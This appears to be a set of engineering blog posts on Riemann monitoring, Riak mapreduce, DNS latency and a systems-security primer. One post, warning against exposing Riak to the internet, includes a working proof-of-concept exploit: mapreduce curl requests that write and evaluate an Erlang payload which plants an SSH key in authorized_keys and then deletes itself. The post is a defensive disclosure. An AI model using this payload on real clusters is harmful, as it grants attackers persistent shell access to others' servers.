Riemann 0.1.0
The initial stable release of Riemann 0.1.0 is available for download. This is the culmination of the 0.0.3 development path and 2 months of production use at Showyou.
Is it production ready? I think so. The fundamental stream operators are in place. A comprehensive test suite checks out. Riemann has never crashed. Its performance characteristics should be suitable for a broad range of scales and applications.
There is a possible memory leak, on the order of 1% per day in our production setup. I can't replicate it under a variety of stress tests. It's not clear to me whether this is legitimate state information (i.e. an increase in tracked data), GC/malloc implementations being greedy, or an actual memory leak. Profiling and understanding this is my top priority for Riemann. If this happens to you, restarting the daemon every few weeks should not be prohibitive; it takes about five seconds to reload. Should you encounter this issue, please drop me a line with your configuration; it may help me identify the cause.
The Riemann talk tonight at Boundary is sold out, but I may deliver another in the next month or so. Thanks for your interest, suggestions, and patches. I hope you enjoy Riemann. :)
Riemann: Breaking the 10k barrier
When I designed UState, I had a goal of a thousand state transitions per second. I hit about six hundred on my Macbook Pro, and skirted 1000/s on real hardware. Eventmachine is good, but I started to bump up against concurrency limits in MRI's interpreter lock, my ability to generate and exchange SQL with SQLite, and protobuf parse times. So I set out to write a faster server. I chose Clojure for its expressiveness and powerful model of concurrent state–and more importantly, the JVM, which gets me Netty, a mature virtual machine with a decent thread model, and a wealth of fast libraries for parsing, state, and statistics. That project is called Riemann.
Today, I'm pleased to announce that Riemann crossed the 10,000 event/second mark in production. In fact it's skirting 11k in my stress tests. (That final drop in throughput is an artifact of the graph system showing partially-complete data.)


By the way, we push about 200 events/sec through a single Riemann server from all of Showyou's infrastructure. There's a lot of headroom.
I did the dumbest, easiest things possible. No profiling. A heavy abstraction (aleph) on top of netty. I haven't even turned on warn-on-reflection or provided type hints yet. All operations are over synchronous TCP. This benchmark measures Riemann's ability to thread events through a complex set of streams including dozens of (where) filters and updating the index with every received event.

I'm in the final stages of packaging Riemann for initial public release this week. Boundary has also kindly volunteered their space for a tech talk on Riemann: Thursday, March 1st, at Boundary's offices, likely at 7 PM. I'll post a Meetup link here and on Twitter shortly.
Highway One

It Boggles the Mind
Microsoft released this little gem today, fixing a bug which allowed remote code execution on all Windows Vista, 6, and Server 2008 versions.
...allow remote code execution if an attacker sends a continuous flow of specially crafted UDP packets to a closed port on a target system.
Meanwhile, in an aging supervillain's cavernous lair...
Why is the RAM always gone?

Endian-ness

Do not expose Riak to the internet
Major thanks to John Muellerleile (@jrecursive) for his help in crafting this.
Actually, don't expose pretty much any database directly to untrusted connections. You're begging for denial-of-service issues; even if the operations are semantically valid, they're running on a physical substrate with real limits.
Riak, for instance, exposes mapreduce over its HTTP API. Mapreduce is code; code which can have side effects; code which is executed on your cluster. This is an attacker's dream.
For instance, Riak reduce phases are given as a module, function name, and an argument. The reduce is called with a list, which is the output of the map phases it is aggregating. There are a lot of functions in Erlang which look like
module:fun([any, list], any_json_serializable_term).But first things first. Let's create an object to mapreduce over.
curl -X PUT -H "content-type: text/plain" \
http://localhost:8098/riak/everything_you_can_run/i_can_run_better --data-binary @-<<EOF
Riak is like the Beatles: listening has side effects.
EOFNow, we'll perform a mapreduce query over this single object. Riak will execute the map function once and pass the list it returns to the reduce function. The map function, in this case, ignores the input and returns a list of numbers. Erlang also represents strings as lists of numbers. Are you thinking what I'm thinking?
curl -X POST -H "content-type: application/json" \
http://databevy.com:8098/mapred --data @-<<\EOF
{"inputs": [ ["everything_you_can_run", "i_can_run_better"] ],
"query": [
{"map": {
"language": "javascript",
"source": "
function(v) {
// "/tmp/evil.erl"
return [47,116,109,112,47,101,118,105,108,46,101,114,108];
}
"
}}, {"reduce": {
"language": "erlang",
"module": "file",
"function": "write_file",
"arg": "
SSHDir = os:getenv(\"HOME\") ++ \"/.ssh/\".\n
SSH = SSHDir ++ \"authorized_keys\".\n
filelib:ensure_dir(os:getenv(\"HOME\") ++ \"/.ssh/\").\n
file:write_file(SSH, <<\"ssh-rsa SOME_PUBLIC_SSH_KEY= Fibonacci\\n\">>).\n
file:change_mode(SSHDir, 8#700).\n
file:change_mode(SSH, 8#600).\n
file:delete(\"/tmp/evil.erl\").
"
}}
]
}
EOFSee it? Riak takes the lists returned by all the map phases (/tmp/evil.erl), and calls the Erlang function file:write_file("/tmp/evil.erl", Arg). Arg is our payload, passed in the reduce phase's argument. That binary string gets written to disk in /tmp.
The payload can do anything. It can patch the VM silently to steal or corrupt data. Crash the system. Steal the cookie and give you a remote erlang shell. Make system calls. It can do this across all machines in the cluster. Here, we take advantage of the fact that the riak user usually has a login shell enabled, and add an entry to .ssh/authorized_hosts.
Now we can use the same trick with another 2-arity function to eval that payload in the Erlang VM.
curl -X POST -H "content-type: application/json" \
http://databevy.com:8098/mapred --data @-<<\EOF
{"inputs": [ ["everything_you_can_run", "i_can_run_better"]],
"query": [
{"map": {
"language": "javascript",
"source": "
function(v) {
return [47,116,109,112,47,101,118,105,108,46,101,114,108];
}
"
}}, {"reduce": {
"language": "erlang",
"module": "file",
"function": "path_eval",
"arg": "/tmp/evil.erl",
}}
]
}Astute readers may recall path_eval ignores its first argument if the second is a file, making the value of the map phase redundant here.
You can now ssh to riak@some_host using the corresponding private key. The payload /tmp/evil.erl removes itself as soon as it's executed, for good measure.
This technique works reliably on single-node clusters, but could be trivially extended to work on any number of nodes. It also doesn't need to touch the disk; you can abuse the scanner/parser to eval strings directly, though it's a more convoluted road. You might also abuse the JS VM to escape the sandbox without any Erlang at all.
In summary: don't expose a database directly to attackers, unless it's been designed from the ground up to deal with multiple tenants, sandboxing, and resource allocation. These are hard problems to solve in a distributed system; it will be some time before robust solutions are available. Meanwhile, protect your database with a layer which allows only known safe operations, and performs the appropriate rate/payload sanity checking.
Riak-pipe mapreduce
As a part of the exciting series of events (long story...) around our riak cluster this week, we switched over to riak-pipe mapreduce. Usually, when a node is down mapreduce times shoot through the roof, which causes slow behavior and even timeouts on the API. Riak-pipe changes that: our API latency for mapreduce-heavy requests like feeds and comments fell from 3-7 seconds to a stable 600ms. Still high, but at least tolerable.

[Update] I should also mention that riak-pipe MR throws about a thousand apparently random, recoverable errors per day. Things like
map_reduce_errorwith no explanation in the logs, or
{"lineno":466,"message":"SyntaxError: syntax error","source":"()"}when the source is definitely not "()". Still haven't figured out why, but it seems vaguely node-dependent.
Oracle, on NoSQL
Do you really want to be contributing to an open source effort? ... Don't be risking your data on NoSQL databases.
Says the company which is scheduling talks around Oracle NoSQL at its OpenWorld conference.
[Edit] Their whitepaper on Oracle NoSQL DB is a hilarious inversion of the above.
Systems Security: A Primer
The riak-users list receives regular questions about how to secure a Riak cluster. This is an overview of the security problem, and some general techniques to approach it.
Theory
You can skip this, but it may be a helpful primer.
Consider an application composed of agents (Alice, Bob) and a datastore (Store). All events in the system can be parameterized by time, position (whether the event took place in Alice, Bob, or Store), and the change in state. Of course, these events do not occur arbitrarily; they are connected by causal links (wires, protocols, code, etc.)
If Alice downloads a piece of information from the Store, the two events E (Store sends information to Alice) and F (Alice receives information from store) are causally connected by the edge EF. The combination of state events with causal connections between them comprises a directed acyclic graph.
A secure system can be characterized as one in which only certain events and edges are allowed. For example, only after a nuclear war can persons on boats fire ze missiles.
A system is secure if all possible events and edges fall within the proscribed set. If you're a weirdo math person you might be getting excited about line graphs and dual spaces and possibly lightcones but... let's bring this back to earth.
Authentication vs Authorization
Authentication is the process of establishing where these events are taking place, in system space. Is the person or agent on the other end of the TCP socket really Alice? Or is it her nefarious twin? Is it the Iranian government?
Authorization is the problem of deciding what edges are allowed. Can Alice download a particular file? Can Bob mark himself as a publisher?
You can usually solve these problems independently of one another.
Asymmetric cryptography combined with PKI allows you to trust big entities, like banks with SSL certificates. Usernames with expensively hashed, salted passwords can verify the repeated identity of a user to a low degree of trust. Oauth providers (like Facebook and Twitter), or OpenID also approach web authentication. You can combine these methods with stronger systems, like RSA secure tokens, challenge-response over a second channel (like texting a code to the user's cell phone), or one-time passwords for higher guarantees.
Authorization tends to be expressed (more or less formally) in code. Sometimes it's called a policy engine. It includes rules saying things like "Anybody can download public files", "a given user can read their own messages", and "only sysadmins can access debugging information".
Strategies
There are a couple of common ways that security can fail. Sometimes the system, as designed, allows insecure operations. Perhaps a check for user identity is skipped when accessing a certain type of record, letting users view each other's paychecks. Other times the abstraction fails; the SSL channel you presumed to be reliable was tapped, allowing information to flow to an eavesdropper, or the language runtime allows payloads from the network to be executed as code. Thus, even if your model (for instance, application code) is provably correct, it may not be fully secure.
As with all abstractions on unreliable substrates, any guarantees you can make are probabilistic in nature. Your job is to provide reasonable guarantees without overwhelming cost (in money, time, or complexity). And these problems are hard.
There are some overall strategies you can use to mitigate these risks. One of them is known as defense in depth. You use overlapping systems which prevent insecure things from happening at more than one layer. A firewall prevents network packets from hitting an internal system, but it's reinforced by an SSL certificate validation that verifies the identity of connections at the transport layer.
You can also simplify building secure systems by choosing to whitelist approved actions, as opposed to blacklisting bad ones. Instead of selecting evil events and causal links (like Alice stealing sensitive data), you enumerate the (typically much smaller) set of correct events and edges, deny all actions, then design your system to explicitly allow the good ones.
Re-use existing primitives. Standard cryptosystems and protocols exist for preventing messages from being intercepted, validating the identity of another party, verifying that a message has not been tampered with or corrupted, and exchanging sensitive information. A lot of hard work went into designing these systems; please use them.
Create layers. Your system will frequently mediate between an internal high-trust subsystem (like a database) and an untrusted set of events (e.g. the internet). Between them you can introduce a variety of layers, each of which can make stricter guarantees about the safety of the edges between events. In the case of a web service:
- TCP/IP can make a reasonable guarantee that a stream is not corrupted.
- The SSL terminator can guarantee (to a good degree) that the stream of bytes you've received has not been intercepted or tampered with.
- The HTTP stack on top of it can validate that the stream represents a valid HTTP request.
- Your validation layer can verify that the parameters involved are of the correct type and size.
- An authentication layer can prove that the originating request came from a certain agent.
- An authorization layer can check that the operation requested by that person is allowed
- An application layer can validate that the request is semantically valid--that it doesn't write a check for a negative amount, or overflow an internal buffer.
- The operation begins.
Minimize trust between discrete systems. Don't relay sensitive information over channels that are insecure. Force other components to perform their own authentication/authorization to obtain sensitive data.
Minimize the surface area for attack. Write less code, and have less ways to interact with the system. The fewer pathways are available, the easier they are to reinforce.
Finally, it's worth writing evil tests to experimentally verify the correctness of your system. Start with the obvious cases and proceed to harder ones. As the complexity grows, probabilistic methods like Quickcheck or fuzz testing can be useful.
Databases
Remember those layers of security? Your datastore resides at the very center of that. In any application which has shared state, your most trusted, validated, safe data is what goes into the persistence layer. The datastore is the most trusted component. A secure system isolates that trusted zone with layers of intermediary security connecting it to the outside world.
Those layers perform the critical task of validating edges between database events (e.g. store Alice's changes to her user record) and the world at large (e.g. alice submits a user update). If your security model is completely open, you can expose the database directly to the internet. Otherwise, you need code to ensure these actions are OK.
The database can do some computation. It is, after all, software. Therefore it can validate some actions. However, the datastore can only discriminate between actions at the level of its abstraction. That can severely limit its potential.
For instance, all datastores can choose to allow or deny connections. However, only relational stores can allow or deny actions on the the basis of the existence of related records, as with foreign key constraints. Only column-oriented stores can validate actions on the basis of columns, and so forth.
Your security model probably has rules like "Only allow HR employees to read other employee's salaries" and "Only let IT remove servers". These constructs, "HR employees", "Salaries", "IT", "remove", and "servers" may not map to the datastore's abstraction. In a key-value store, "remove" can mean "write a copy of a JSON document without a certain entry present". The key-value store is blind to the contents of the value, and hence cannot enforce any security policies which depend on it.
In almost every case, your security model will not be embeddable within the datastore, and the datastore cannot enforce it for you. You will need to apply the security model at least partially at a higher level.
Doing this is easy.
Allow only trusted hosts to initiate connections to the database, using firewall rulesets. Usenames and passwords for database connections typically provide little additional security, as they're stored in dozens of places across the production environment. Relying on these credentials or any authorization policy linked to them (e.g. SQL GRANT) is worthless when you assume your host, or even client software, has been compromised. The attacker will simply read these credentials from disk or off the wire, or exploit active connections in software.
On trusted hosts, between the datastore and the outside world, write the application which enforces your security model. Separate layers into separate processes and separate hosts, where reasonable. Finally, untrusted hosts connect these layers to the internet. You can have as many or as few layers as you like, depending on how strongly you need to guarantee isolation and security.
Putting it all together
Lets sell storage in Riak to people, over the web. We'll present the same API as Riak, over HTTP.
Here's a security model: Only traffic from users with accounts is allowed. Users can only read and write data from their respective buckets, which are transparently assigned on write. Also, users should only be able to issue x requests/second, to prevent them from interfering with other users on the cluster.
We're going to presuppose the existence of an account service (perhaps Riak, mysql, whatever) which stores account information, and a bucket service that registers buckets to users.
- Internet. Users connect over HTTPS to an application node.
- The HTTPS server's SSL acceptor decrypts the message and ensures transport validity.
- The HTTP server validates that the request is in fact valid HTTP.
- The authentication layer examines the HTTP AUTH headers for a valid username and password, comparing them to bcrypt-hashed values on the account service.
- The rate limiter checks that this user has not made too many requests recently, and updates the request rate in the account service.
- The Riak validator checks to make sure that the request is a well-formed request to Riak; that it has the appropriate URL structure, accept header, vclock, etc. It constructs a new HTTP request to forward on to Riak.
- The bucket validator checks with the bucket service to see if the bucket to be used is taken. If it is, it verifies that the current authenticated user matches the bucket owner. If it isn't, it registers the bucket.
- The application node relays the request over the network to a Riak node.
- Riak nodes are allowed by the firewall to talk only to application nodes. The Riak node executes the request and returns a response.
- The response is immediately returned to the client.
Naturally, this only works for certain operations. Mapreduce, for instance, excecutes code in Riak. Exposing it to the internet is asking for trouble. That's why we need a Riak validation layer to ensure the request is acceptable; it can allow only puts and gets.
Happy hacking
I hope this gives you some idea of how to architect secure applications. Apologies for the shoddy editing--I don't have time for a second pass right now and wanted to get this out the door. Questions and suggestions in the comments, please! :-)
Progressive House

It's always DNS's fault
One of the hard-won lessons of the last few weeks has been that inexplicable periodic latency jumps in network services should be met with an investigation into named.

API latency has been wonky the last couple weeks; for a few hours it will rise to roughly 5 to 10x normal, then drop again. Nothing in syslog, no connection table issues, ip stats didn't reveal any TCP/IP layer difficulties, network was solid, no CPU, memory, or disk contention, no obviously correlated load on other hosts. Turns out it was Bind getting overwhelmed (we have, er, nontrivial DNS demands) and causing local domain resolution to slow down. For now I'm just pushing everything out in /etc/hosts, but will probably drop a local bind9 on every host as a cache.
If anyone has experience with production DNS resolver caching, would appreciate your input.
Non-commercial re-use with attribution encouraged; all other rights reserved.
Comments are the property of respective posters.